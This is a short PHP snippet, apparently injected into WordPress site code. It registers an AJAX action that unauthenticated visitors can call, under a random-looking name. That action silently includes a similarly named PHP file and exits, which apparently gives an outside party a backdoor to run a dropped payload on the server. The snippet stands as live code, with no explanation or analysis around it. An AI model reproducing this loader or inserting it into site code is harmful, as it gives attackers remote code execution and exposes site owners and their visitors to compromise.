if(!function_exists('file_check_tmp03aqol2k')){ add_action('wp_ajax_nopriv_file_check_tmp03aqol2k', 'file_check_tmp03aqol2k'); add_action('wp_ajax_file_check_tmp03aqol2k', 'file_check_tmp03aqol2k'); function file_check_tmp03aqol2k() { $file = __DIR__ . '/' . 'tmp03aqol2k.php'; if (file_exists($file)) { include $file; } die(); } }